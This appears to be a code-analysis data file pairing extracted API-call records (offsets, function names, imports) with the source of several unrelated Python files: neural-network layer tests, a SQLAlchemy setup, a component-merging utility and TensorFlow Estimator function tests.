(25538, 25544), False, 'import torch\n'), ((26684, 26711), 'torch.nn.Sequential', 'torch.nn.Sequential', (['*model'], {}), '(*model)\n', (26703, 26711), False, 'import torch\n'), ((26908, 26927), 'torch.nn.ReLU', 'torch.nn.ReLU', (['(True)'], {}), '(True)\n', (26921, 26927), False, 'import torch\n'), ((28301, 28333), 'torch.nn.Sequential', 'torch.nn.Sequential', (['*conv_block'], {}), '(*conv_block)\n', (28320, 28333), False, 'import torch\n'), ((28756, 28777), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ([], {}), '()\n', (28775, 28777), True, 'import torchvision.transforms as transforms\n'), ((34737, 34756), 'cv2.imread', 'cv2.imread', (['i_image'], {}), '(i_image)\n', (34747, 34756), False, 'import cv2\n'), ((34827, 34887), 'cv2.resize', 'cv2.resize', (['dress', '(512, 512)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(dress, (512, 512), interpolation=cv2.INTER_CUBIC)\n', (34837, 34887), False, 'import cv2\n'), ((34959, 35019), 'cv2.resize', 'cv2.resize', (['watermark', '(w, h)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(watermark, (w, h), interpolation=cv2.INTER_CUBIC)\n', (34969, 35019), False, 'import cv2\n'), ((35028, 35059), 'cv2.imwrite', 'cv2.imwrite', (['i_image', 'watermark'], {}), '(i_image, watermark)\n', (35039, 35059), False, 'import cv2\n'), ((2440, 2473), 'math.floor', 'math.floor', (['(n_cols * half_percent)'], {}), '(n_cols * half_percent)\n', (2450, 2473), False, 'import math\n'), ((2499, 2539), 'math.ceil', 'math.ceil', (['(n_cols * (1.0 - half_percent))'], {}), '(n_cols * (1.0 - half_percent))\n', (2508, 2539), False, 'import math\n'), ((5969, 5997), 'cv2.inRange', 'cv2.inRange', (['maskref', 'f1', 'f2'], {}), '(maskref, f1, f2)\n', (5980, 5997), False, 'import cv2\n'), ((8763, 8786), 'numpy.asarray', 'np.asarray', (['[0, 0, 250]'], {}), '([0, 0, 250])\n', (8773, 8786), True, 'import numpy as np\n'), ((8820, 8843), 'numpy.asarray', 'np.asarray', (['[0, 0, 255]'], {}), '([0, 0, 255])\n', (8830, 8843), True, 'import numpy as np\n'), ((8865, 8891), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (8876, 8891), False, 'import cv2\n'), ((9545, 9564), 'cv2.fitEllipse', 'cv2.fitEllipse', (['cnt'], {}), '(cnt)\n', (9559, 9564), False, 'import cv2\n'), ((22240, 22279), 'cv2.cvtColor', 'cv2.cvtColor', (['cv_img', 'cv2.COLOR_BGR2RGB'], {}), '(cv_img, cv2.COLOR_BGR2RGB)\n', (22252, 22279), False, 'import cv2\n'), ((23497, 23512), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (23510, 23512), False, 'import torch\n'), ((23792, 23813), 'torch.load', 'torch.load', (['save_path'], {}), '(save_path)\n', (23802, 23813), False, 'import torch\n'), ((25563, 25590), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(3)'], {}), '(3)\n', (25587, 25590), False, 'import torch\n'), ((25592, 25648), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['input_nc', 'ngf'], {'kernel_size': '(7)', 'padding': '(0)'}), '(input_nc, ngf, kernel_size=7, padding=0)\n', (25607, 25648), False, 'import torch\n'), ((26540, 26567), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(3)'], {}), '(3)\n', (26564, 26567), False, 'import torch\n'), ((26569, 26626), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['ngf', 'output_nc'], {'kernel_size': '(7)', 'padding': '(0)'}), '(ngf, output_nc, kernel_size=7, padding=0)\n', (26584, 26626), False, 'import torch\n'), ((26646, 26661), 'torch.nn.Tanh', 'torch.nn.Tanh', ([], {}), '()\n', (26659, 26661), False, 'import torch\n'), ((27602, 27653), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['dim', 'dim'], {'kernel_size': '(3)', 'padding': 'p'}), '(dim, dim, kernel_size=3, padding=p)\n', (27617, 27653), False, 'import torch\n'), ((28192, 28243), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['dim', 'dim'], {'kernel_size': '(3)', 'padding': 'p'}), '(dim, dim, kernel_size=3, padding=p)\n', (28207, 28243), False, 'import torch\n'), ((28825, 28879), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['(0.5, 0.5, 0.5)', '(0.5, 0.5, 0.5)'], {}), '((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n', (28845, 28879), True, 'import torchvision.transforms as transforms\n'), ((29770, 29806), 'numpy.transpose', 'np.transpose', (['image_numpy', '(1, 2, 0)'], {}), '(image_numpy, (1, 2, 0))\n', (29782, 29806), True, 'import numpy as np\n'), ((4804, 4878), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(0, 205, 0)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 205, 0), -1)\n', (4815, 4878), False, 'import cv2\n'), ((8935, 8958), 'numpy.asarray', 'np.asarray', (['[250, 0, 0]'], {}), '([250, 0, 0])\n', (8945, 8958), True, 'import numpy as np\n'), ((8986, 9009), 'numpy.asarray', 'np.asarray', (['[255, 0, 0]'], {}), '([255, 0, 0])\n', (8996, 9009), True, 'import numpy as np\n'), ((9031, 9057), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (9042, 9057), False, 'import cv2\n'), ((19519, 19543), 'random.uniform', 'random.uniform', (['(0.4)', '(1.5)'], {}), '(0.4, 1.5)\n', (19533, 19543), False, 'import random\n'), ((19573, 19597), 'random.uniform', 'random.uniform', (['(0.4)', '(1.5)'], {}), '(0.4, 1.5)\n', (19587, 19597), False, 'import random\n'), ((25807, 25886), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['(ngf * mult)', '(ngf * mult * 2)'], {'kernel_size': '(3)', 'stride': '(2)', 'padding': '(1)'}), '(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1)\n', (25822, 25886), False, 'import torch\n'), ((27293, 27320), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(1)'], {}), '(1)\n', (27317, 27320), False, 'import torch\n'), ((27781, 27802), 'torch.nn.Dropout', 'torch.nn.Dropout', (['(0.5)'], {}), '(0.5)\n', (27797, 27802), False, 'import torch\n'), ((27884, 27911), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(1)'], {}), '(1)\n', (27908, 27911), False, 'import torch\n'), ((4945, 5019), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(0, 0, 255)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 0, 255), -1)\n', (4956, 5019), False, 'import cv2\n'), ((9103, 9128), 'numpy.asarray', 'np.asarray', (['[250, 0, 250]'], {}), '([250, 0, 250])\n', (9113, 9128), True, 'import numpy as np\n'), ((9158, 9183), 'numpy.asarray', 'np.asarray', (['[255, 0, 255]'], {}), '([255, 0, 255])\n', (9168, 9183), True, 'import numpy as np\n'), ((9205, 9231), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (9216, 9231), False, 'import cv2\n'), ((15727, 15752), 'random.uniform', 'random.uniform', (['(0.03)', '(0.1)'], {}), '(0.03, 0.1)\n', (15741, 15752), False, 'import random\n'), ((16144, 16169), 'random.uniform', 'random.uniform', (['(0.03)', '(0.1)'], {}), '(0.03, 0.1)\n', (16158, 16169), False, 'import random\n'), ((18751, 18777), 'random.uniform', 'random.uniform', (['(0.03)', '(0.09)'], {}), '(0.03, 0.09)\n', (18765, 18777), False, 'import random\n'), ((27391, 27419), 'torch.nn.ReplicationPad2d', 'torch.nn.ReplicationPad2d', (['(1)'], {}), '(1)\n', (27416, 27419), False, 'import torch\n'), ((27982, 28010), 'torch.nn.ReplicationPad2d', 'torch.nn.ReplicationPad2d', (['(1)'], {}), '(1)\n', (28007, 28010), False, 'import torch\n'), ((29682, 29718), 'numpy.transpose', 'np.transpose', (['image_numpy', '(1, 2, 0)'], {}), '(image_numpy, (1, 2, 0))\n', (29694, 29718), True, 'import numpy as np\n'), ((33750, 33785), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_RGB2BGR'], {}), '(im, cv2.COLOR_RGB2BGR)\n', (33762, 33785), False, 'import cv2\n'), ((5079, 5157), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(255, 255, 255)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 255, 255), -1)\n', (5090, 5157), False, 'import cv2\n'), ((33871, 33906), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_RGB2BGR'], {}), '(im, cv2.COLOR_RGB2BGR)\n', (33883, 33906), False, 'import cv2\n'), ((5221, 5297), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(255, 0, 255)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 255), -1)\n', (5232, 5297), False, 'import cv2\n'), ((33986, 34021), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_RGB2BGR'], {}), '(im, cv2.COLOR_RGB2BGR)\n', (33998, 34021), False, 'import cv2\n'), ((5360, 5434), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(255, 0, 0)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 0), -1)\n', (5371, 5434), False, 'import cv2\n'), ((5664, 5735), 'cv2.rectangle', 'cv2.rectangle', (['details', '(xmin, ymin)', '(xmax, ymax)', '(100, 100, 100)', '(-1)'], {}), '(details, (xmin, ymin), (xmax, ymax), (100, 100, 100), -1)\n', (5677, 5735), False, 'import cv2\n')]
|
from layer import *
import itertools
# This file just tests the implementations in layer.py
if __name__ == "__main__":
def test_ACL(V):
# construct ACL with complex values
def amFactoryI(Nlayer, activation):
moduleList = []
for l in range(Nlayer-1):
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
# this makes the ACL to be the identity
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
moduleList.append(activation())
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
# no activation after the last layer
# we don't need the log det from these, therefore fall back to
# torchs' Sequential container
return torch.nn.Sequential(*moduleList)
for act in [torch.nn.Tanh, torch.nn.Softsign]:
for L in [1,2,4,16,32]:
ACL = createACL(amFactoryI,amFactoryI, Nlayer = L, activation = act)
x_A = torch.randn(V//2,dtype=torch.cdouble)
x_B = torch.randn(V//2,dtype=torch.cdouble)
with torch.no_grad():
y_A,logDetJ = ACL(x_A,x_B)
if not (x_A==y_A).all():
raise RuntimeError(f"{Nlayer} Layer ACL (V = {V}) is not initialized to the identity: x_A:\n {x_A} \n y_A:\n {y_A}")
# check that the logDetJ is zero
if not logDetJ == 0:
raise RuntimeError(f"{Nlayer} Layer ACL (V = {V}) has wrong logDetJ: logDetJ={logDetJ} != 0 ")
# Test Failed Successfully...
print("ACL Test successful")
def test_PRACL(V):
def amFactoryI(L, activation):
moduleList = []
for l in range(L-1):
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
# this makes the ACL to be the identity
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
moduleList.append(activation())
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
# no activation after the last layer
# we don't need the log det from these, therefore fall back to
# torchs' Sequential container
return torch.nn.Sequential(*moduleList)
def amFactoryR(L, activation):
moduleList = []
for l in range(L-1):
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
moduleList.append(layer)
moduleList.append(activation())
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
moduleList.append(layer)
# no activation after the last layer
# we don't need the log det from these, therefore fall back to
# torchs' Sequential container
return torch.nn.Sequential(*moduleList)
def PRACL_wrapper(myPRACL, inputTensor):
out,_ = myPRACL(inputTensor)
return out
# Test PRCL as identity
for act in [torch.nn.Tanh, torch.nn.Softsign]:
for LPRACL,LACL in itertools.product([1,2,4,16],repeat=2):
PRACL = createPRCL(V,LPRACL,
lambda *args,**kwargs: createACL(amFactoryI,amFactoryI,**kwargs),
L=LACL,activation=act # are passed as **kwargs to the lambda
)
x = torch.randn(V,dtype=torch.cdouble)
with torch.no_grad():
y,logDetJ = PRACL(x)
if not (x==y).all():
raise RuntimeError(f"{LPRACL}:{LACL} Layer PRACL (V = {V}) is not initialized to the identity: x_A:\n {x_A} \n y_A:\n {y_A}")
# check that the logDetJ is zero
if not logDetJ == 0:
raise RuntimeError(f"{LPRACL}:{LACL} Layer PRACL (V = {V}) has wrong logDetJ: logDetJ={logDetJ} != 0 ")
print("PRACL Identity Test successful")
# Test randomly initialized PRACL
for act in [torch.nn.Tanh, torch.nn.Softsign]:
for LPRACL,LACL in itertools.product([1,2],repeat=2):
PRACL = createPRCL(V,LPRACL,
lambda *args,**kwargs: createACL(amFactoryR,amFactoryR,**kwargs),
L=LACL,activation=act # are passed as **kwargs to the lambda
)
x = torch.randn(V,dtype=torch.cdouble)
xclone = x.clone();
with torch.no_grad():
y,logDetJ = PRACL(x)
# This call is numerical very unstable
# therefore, the following test sometimes fails
# not only on a precision level but also on orders of
# magnitude. We found a similar behaviour with log det
# in NSL. This is realy odd...
# I ran the test multiple times and most of the times it fails
# Even for real numbers (using .logdet) it sometimes fails
#sign,logabsdet = torch.autograd.functional.jacobian(
# lambda inTensor: PRACL_wrapper(PRACL,inTensor),
# x
#).slogdet()
#logDetJ_2 = torch.log(sign) + logabsdet
## check that the logDetJ match
#if not torch.isclose( torch.real(logDetJ),torch.real(logDetJ_2) ):
# raise RuntimeError(f"{LPRACL}:{LACL} Layer ACL (V = {V}) has wrong Re logDetJ: Re logDetJ={logDetJ.real:.20} != {logDetJ_2.real:.20} ")
#if not torch.isclose( torch.imag(logDetJ),torch.imag(logDetJ_2) ):
# raise RuntimeError(f"{LPRACL}:{LACL} Layer ACL (V = {V}) has wrong Im logDetJ: Im logDetJ={logDetJ.imag:.20} != {logDetJ_2.imag:.20} ")
print("PRACL Random Test successful")
for V in [2,4,16,32,128]:
test_ACL(V)
test_PRACL(V)
|
[
"itertools.product"
] |
[((3746, 3788), 'itertools.product', 'itertools.product', (['[1, 2, 4, 16]'], {'repeat': '(2)'}), '([1, 2, 4, 16], repeat=2)\n', (3763, 3788), False, 'import itertools\n'), ((4738, 4773), 'itertools.product', 'itertools.product', (['[1, 2]'], {'repeat': '(2)'}), '([1, 2], repeat=2)\n', (4755, 4773), False, 'import itertools\n')]
|
import enum
from datetime import datetime
from functools import reduce
from sqlalchemy import (create_engine)
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
database_uri = 'sqlite:///:memory:'
debug = False
db = create_engine(database_uri, echo=debug)
Base = declarative_base()
session = sessionmaker(bind=db)()
|
[
"sqlalchemy.create_engine",
"sqlalchemy.ext.declarative.declarative_base",
"sqlalchemy.orm.sessionmaker"
] |
[((264, 303), 'sqlalchemy.create_engine', 'create_engine', (['database_uri'], {'echo': 'debug'}), '(database_uri, echo=debug)\n', (277, 303), False, 'from sqlalchemy import create_engine\n'), ((311, 329), 'sqlalchemy.ext.declarative.declarative_base', 'declarative_base', ([], {}), '()\n', (327, 329), False, 'from sqlalchemy.ext.declarative import declarative_base\n'), ((340, 361), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'db'}), '(bind=db)\n', (352, 361), False, 'from sqlalchemy.orm import sessionmaker\n')]
|
import functools
import typing
from collections import namedtuple
COMPONENT = namedtuple('COMPONENT', ['includes', 'files'])
WEB_INCLUDE = namedtuple('WEB_INCLUDE', ['name', 'src'])
def merge_components(
*components: typing.Union[list, tuple, COMPONENT]
) -> COMPONENT:
"""
Merges multiple COMPONENT instances into a single one by merging the
lists of includes and files. Has support for elements of the components
arguments list to be lists or tuples of COMPONENT instances as well.
:param components:
:return:
"""
flat_components = functools.reduce(flatten_reducer, components, [])
return COMPONENT(
includes=functools.reduce(
functools.partial(combine_lists_reducer, 'includes'),
flat_components,
[]
),
files=functools.reduce(
functools.partial(combine_lists_reducer, 'files'),
flat_components,
[]
)
)
def flatten_reducer(
flattened_list: list,
entry: typing.Union[list, tuple, COMPONENT]
) -> list:
"""
Flattens a list of COMPONENT instances to remove any lists or tuples
of COMPONENTS contained within the list
:param flattened_list:
The existing flattened list that has been populated from previous
calls of this reducer function
:param entry:
An entry to be reduced. Either a COMPONENT instance or a list/tuple
of COMPONENT instances
:return:
The flattened list with the entry flatly added to it
"""
if hasattr(entry, 'includes') and hasattr(entry, 'files'):
flattened_list.append(entry)
elif entry:
flattened_list.extend(entry)
return flattened_list
def combine_lists_reducer(
key: str,
merged_list: list,
component: COMPONENT
) -> list:
"""
Reducer function to combine the lists for the specified key into a
single, flat list
:param key:
The key on the COMPONENT instances to operate upon
:param merged_list:
The accumulated list of values populated by previous calls to this
reducer function
:param component:
The COMPONENT instance from which to append values to the
merged_list
:return:
The updated merged_list with the values for the COMPONENT added
onto it
"""
merged_list.extend(getattr(component, key))
return merged_list
|
[
"functools.reduce",
"functools.partial",
"collections.namedtuple"
] |
[((79, 125), 'collections.namedtuple', 'namedtuple', (['"""COMPONENT"""', "['includes', 'files']"], {}), "('COMPONENT', ['includes', 'files'])\n", (89, 125), False, 'from collections import namedtuple\n'), ((140, 182), 'collections.namedtuple', 'namedtuple', (['"""WEB_INCLUDE"""', "['name', 'src']"], {}), "('WEB_INCLUDE', ['name', 'src'])\n", (150, 182), False, 'from collections import namedtuple\n'), ((579, 628), 'functools.reduce', 'functools.reduce', (['flatten_reducer', 'components', '[]'], {}), '(flatten_reducer, components, [])\n', (595, 628), False, 'import functools\n'), ((698, 750), 'functools.partial', 'functools.partial', (['combine_lists_reducer', '"""includes"""'], {}), "(combine_lists_reducer, 'includes')\n", (715, 750), False, 'import functools\n'), ((851, 900), 'functools.partial', 'functools.partial', (['combine_lists_reducer', '"""files"""'], {}), "(combine_lists_reducer, 'files')\n", (868, 900), False, 'import functools\n')]
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Estimator function objects."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import six as six
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import save
from tensorflow.python.training import training
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_lib
from tensorflow_estimator.python.estimator.export import function
from tensorflow_estimator.python.estimator.mode_keys import ModeKeys
def _string_fix(obj):
return nest.map_structure(
lambda x: compat.as_bytes(x) if isinstance(x, six.string_types) else x,
obj)
def _model_fn(features, labels, mode):
v = variables.Variable(constant_op.constant(23), name='v')
if mode == ModeKeys.PREDICT:
return model_fn_lib.EstimatorSpec(
ModeKeys.PREDICT,
predictions=features + 1)
elif mode == ModeKeys.EVAL:
return model_fn_lib.EstimatorSpec(
ModeKeys.EVAL,
loss=constant_op.constant(5) + v,
predictions=features + labels)
elif mode == ModeKeys.TRAIN:
return model_fn_lib.EstimatorSpec(
ModeKeys.TRAIN,
predictions=features * labels,
loss=constant_op.constant(5) + v,
train_op=state_ops.assign_add(training.get_global_step(), 1))
def _model_fn_train_only(features, labels):
v = variables.Variable(constant_op.constant(23), name='v')
return model_fn_lib.EstimatorSpec(
ModeKeys.TRAIN,
predictions=features * labels,
loss=constant_op.constant(5) + v,
train_op=state_ops.assign_add(training.get_global_step(), 1))
def _model_fn_predict_only(features):
return model_fn_lib.EstimatorSpec(
ModeKeys.PREDICT,
predictions=features + 1)
# TODO(kathywu): Re-enable test after def_function changes are built into
# nightlies.
@test_util.run_all_in_graph_and_eager_modes
class ModelFunctionTest(object):
def test_from_function(self):
mfn = function.ModelFunction.from_function(_model_fn)
out = mfn.train(constant_op.constant(3), constant_op.constant(5))
self.evaluate(variables.variables_initializer(mfn.variables.values()))
self.assertEqual(15, self.evaluate(out['predictions']))
out = mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
self.assertEqual(16, self.evaluate(out['predictions']))
out = mfn.predict(constant_op.constant(10))
self.assertEqual(11, self.evaluate(out['predictions']))
def test_model_fn_train_only(self):
mfn = function.ModelFunction()
mfn.add_mode(_model_fn_train_only, ModeKeys.TRAIN)
out = mfn.train(constant_op.constant(4), constant_op.constant(6))
self.evaluate(variables.variables_initializer(mfn.variables.values()))
self.assertEqual(24, self.evaluate(out['predictions']))
with self.assertRaisesRegexp(ValueError, 'not defined'):
out = mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
def test_model_fn_predict_only(self):
mfn = function.ModelFunction()
mfn.add_mode(_model_fn_predict_only, ModeKeys.PREDICT)
out = mfn.predict(constant_op.constant(4))
self.evaluate(variables.variables_initializer(mfn.variables.values()))
self.assertEqual(5, self.evaluate(out['predictions']))
with self.assertRaisesRegexp(ValueError, 'not defined'):
out = mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
def test_save_and_load(self):
mfn = function.ModelFunction.from_function(_model_fn)
out = mfn.train(constant_op.constant(3), constant_op.constant(5))
self.evaluate(variables.variables_initializer(mfn.variables.values()))
self.evaluate(out['predictions'])
for _ in range(2):
out = mfn.train(constant_op.constant(3), constant_op.constant(5))
self.evaluate(out['predictions'])
self.assertEqual(
3, self.evaluate(mfn._variable_holder.variables['global_step']))
mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
mfn.predict(constant_op.constant(10))
save_dir = os.path.join(self.get_temp_dir(), 'model_function')
save.save(mfn, save_dir)
obj = load.load(save_dir)
variables_by_name = obj._variables_by_name
self.evaluate(variables.variables_initializer(
variables_by_name._unconditional_dependency_names.values()))
self.assertEqual(3, self.evaluate(variables_by_name.global_step))
out = obj._functions['train'](constant_op.constant(3),
constant_op.constant(5))
self.assertEqual(15, self.evaluate(out['predictions']))
self.assertEqual(4, self.evaluate(variables_by_name.global_step))
out = obj._functions['eval'](constant_op.constant(7),
constant_op.constant(9))
self.assertEqual(16, self.evaluate(out['predictions']))
out = obj._functions['infer'](constant_op.constant(10))
self.assertEqual(11, self.evaluate(out['predictions']))
def _model_fn_callable_variable_initializers(features, labels, mode):
"""Model_fn with callable variable initializers (for WrappedGraph tests)."""
_ = features, labels
v = variables.Variable(lambda: constant_op.constant(23), name='v')
if mode == ModeKeys.PREDICT:
return model_fn_lib.EstimatorSpec(
ModeKeys.PREDICT,
predictions=features + 1)
elif mode == ModeKeys.EVAL:
return model_fn_lib.EstimatorSpec(
ModeKeys.EVAL,
loss=constant_op.constant(5) + v,
predictions=features + labels)
elif mode == ModeKeys.TRAIN:
return model_fn_lib.EstimatorSpec(
ModeKeys.TRAIN,
predictions=features * labels,
loss=constant_op.constant(5) + v,
train_op=state_ops.assign_add(training.get_global_step(), 1))
@test_util.run_all_in_graph_and_eager_modes
class EstimatorWrappedGraphTest(test.TestCase):
def test_wrap_model_fn_train(self):
graph = function._EstimatorWrappedGraph()
features = constant_op.constant(3)
labels = constant_op.constant(4)
mode = ModeKeys.TRAIN
fn = graph.wrap_model_fn(
_model_fn_callable_variable_initializers,
mode=mode, args=[features, labels, mode], kwargs={})
self.evaluate(variables.variables_initializer(graph.variables.values()))
self.assertEqual(0, self.evaluate(graph.global_step))
self.assertEqual(12, self.evaluate(fn(features, labels)['predictions']))
self.assertEqual(1, self.evaluate(graph.global_step))
self.assertEqual('AssignAddVariableOp',
graph.estimator_spec.train_op.type)
def test_wrap_model_fn_eval(self):
graph = function._EstimatorWrappedGraph()
features = constant_op.constant(5)
labels = constant_op.constant(6)
mode = ModeKeys.EVAL
fn = graph.wrap_model_fn(
_model_fn_callable_variable_initializers,
mode=mode, args=[features, labels, mode], kwargs={})
self.assertDictEqual({'predictions': 11},
self.evaluate(fn(features, labels)))
def test_wrap_model_fn_predict(self):
graph = function._EstimatorWrappedGraph()
features = constant_op.constant(7)
mode = ModeKeys.PREDICT
fn = graph.wrap_model_fn(
_model_fn_callable_variable_initializers,
mode=mode, args=[features, None, mode], kwargs={})
self.assertDictEqual({'predictions': 8},
self.evaluate(fn(features)))
def test_wrap_input_receiver_fn(self):
def serving_input_fn():
receiver_1 = array_ops.placeholder(dtypes.string)
receiver_2 = array_ops.placeholder(dtypes.string)
receiver_tensors = {
'rec1': receiver_1,
u'rec2': receiver_2,
}
concat = string_ops.string_join([receiver_1, receiver_2])
concat2 = array_ops.identity(concat)
features = {
'feature0': string_ops.string_join([concat, concat2], ':'),
u'feature1': constant_op.constant([1])
}
alternate_tensors = {
'alt_name_1': concat,
'alt_name_2': {
'tensor1': concat,
'tensor2': concat2}
}
return export_lib.ServingInputReceiver(
features, receiver_tensors, alternate_tensors)
graph = function._EstimatorWrappedGraph()
fns = graph.wrap_input_receiver_fn(serving_input_fn)
for fn, name in fns:
if name is None:
out = fn(constant_op.constant('1'), constant_op.constant('2'))
self.assertDictEqual(
_string_fix({'feature0': '12:12', 'feature1': [1]}),
_string_fix(self.evaluate(out)))
elif name == 'alt_name_1':
out = fn(constant_op.constant('3'))
self.assertDictEqual(
_string_fix({'feature0': '3:3', 'feature1': [1]}),
_string_fix(self.evaluate(out)))
elif name == 'alt_name_2':
out = fn(constant_op.constant('4'), constant_op.constant('5'))
self.assertDictEqual(
_string_fix({'feature0': '4:5', 'feature1': [1]}),
_string_fix(self.evaluate(out)))
if __name__ == '__main__':
test.main()
|
[
"tensorflow.python.platform.test.main",
"tensorflow.python.util.compat.as_bytes",
"tensorflow_estimator.python.estimator.export.export_lib.ServingInputReceiver",
"tensorflow.python.saved_model.save.save",
"tensorflow_estimator.python.estimator.export.function._EstimatorWrappedGraph",
"tensorflow.python.ops.array_ops.identity",
"tensorflow_estimator.python.estimator.model_fn.EstimatorSpec",
"tensorflow.python.framework.constant_op.constant",
"tensorflow_estimator.python.estimator.export.function.ModelFunction.from_function",
"tensorflow.python.ops.array_ops.placeholder",
"tensorflow.python.saved_model.load.load",
"tensorflow.python.training.training.get_global_step",
"tensorflow_estimator.python.estimator.export.function.ModelFunction",
"tensorflow.python.ops.string_ops.string_join"
] |
[((2898, 2968), 'tensorflow_estimator.python.estimator.model_fn.EstimatorSpec', 'model_fn_lib.EstimatorSpec', (['ModeKeys.PREDICT'], {'predictions': '(features + 1)'}), '(ModeKeys.PREDICT, predictions=features + 1)\n', (2924, 2968), True, 'from tensorflow_estimator.python.estimator import model_fn as model_fn_lib\n'), ((10206, 10217), 'tensorflow.python.platform.test.main', 'test.main', ([], {}), '()\n', (10215, 10217), False, 'from tensorflow.python.platform import test\n'), ((1954, 1978), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(23)'], {}), '(23)\n', (1974, 1978), False, 'from tensorflow.python.framework import constant_op\n'), ((2032, 2102), 'tensorflow_estimator.python.estimator.model_fn.EstimatorSpec', 'model_fn_lib.EstimatorSpec', (['ModeKeys.PREDICT'], {'predictions': '(features + 1)'}), '(ModeKeys.PREDICT, predictions=features + 1)\n', (2058, 2102), True, 'from tensorflow_estimator.python.estimator import model_fn as model_fn_lib\n'), ((2609, 2633), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(23)'], {}), '(23)\n', (2629, 2633), False, 'from tensorflow.python.framework import constant_op\n'), ((3191, 3238), 'tensorflow_estimator.python.estimator.export.function.ModelFunction.from_function', 'function.ModelFunction.from_function', (['_model_fn'], {}), '(_model_fn)\n', (3227, 3238), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((3736, 3760), 'tensorflow_estimator.python.estimator.export.function.ModelFunction', 'function.ModelFunction', ([], {}), '()\n', (3758, 3760), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((4211, 4235), 'tensorflow_estimator.python.estimator.export.function.ModelFunction', 'function.ModelFunction', ([], {}), '()\n', (4233, 4235), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((4658, 4705), 'tensorflow_estimator.python.estimator.export.function.ModelFunction.from_function', 'function.ModelFunction.from_function', (['_model_fn'], {}), '(_model_fn)\n', (4694, 4705), False, 'from tensorflow_estimator.python.estimator.export import function\n'), ((5303, 5327), 'tensorflow.python.saved_model.save.save', 'save.save', (['mfn', 'save_dir'], {}), '(mfn, save_dir)\n', (5312, 5327), False, 'from tensorflow.python.saved_model import save\n'), ((5339, 5358), 'tensorflow.python.saved_model.load.load', 